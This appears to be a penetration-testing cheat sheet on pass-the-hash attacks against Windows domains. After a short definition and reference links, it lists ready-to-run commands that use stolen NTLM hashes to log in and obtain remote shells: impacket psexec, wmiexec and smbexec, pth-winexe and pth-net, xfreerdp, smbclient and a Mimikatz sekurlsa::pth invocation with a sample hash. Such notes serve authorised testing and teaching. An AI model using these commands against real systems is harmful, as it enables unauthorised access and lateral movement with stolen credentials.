Pass-the-Hash

Pass the hash allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case. It replaces the need for stealing the plaintext password with merely stealing the hash and using that to authenticate with.

• Pass-the-Hash in Windows 10 (SANS)
• Alternative ways to Pass the Hash (PtH)

Impacket

USER=Administrator
HASH=<LM hash>:<NTLM hash>

impacket-psexec -dc-ip $DC_IP -hashes ${HASH} ${DOMAIN}/${USER}@${IP}

impacket-wmiexec ${DOMAIN}/${USER}@${IP} -hashes aad3b435b51404eeaad3b435b51404ee:${HASH}

Passing-The-Hash toolkit

• Official Documentation (GitHub)

Help

Available tools: winexe, wmic, wmis, rpcclient, smbclient, smbget, net

pth-winexe

Examples

pth-net rpc info -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IP

pth-net rpc user -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IP

pth-net rpc group -U 'example.com/john%00000000000000000000000000000000:<ntlm hash>' -S $IP

pth-net status sessions -U 'example.com/<username>%00000000000000000000000000000000:<ntlm hash>' -S $IP

Pass-the-Hash – SMB Share

pth-winexe -U <username>%<smb share (md5)>:<NTLM hash> //$IP cmd

pth-winexe -U domain/username%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //$IP cmd

Impacket scripts

impacket-wmiexec ${DOMAIN}/${USER}@${IP} -hashes aad3b435b51404eeaad3b435b51404ee:${HASH}

Get a semi-interactive shell!

impacket-smbexec -hashes :${HASH} ${DOMAIN}/${USER}@${IP}

RDP

See Pass-the-Hash in Windows 10 (SANS)
Alternative ways to Pass the Hash (PtH) for more details on restrictions.

xfreerdp /cert:ignore /v:${IP} /u:${USER} /pth:${NTLM_HASH}

SMB

See smbclient.

smbclient //${IP}/myshare -U $USER --pw-nt-hash $HASH -W $DOMAIN

Mimikatz

Lateral Movement: Pass the Hash Attack

mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38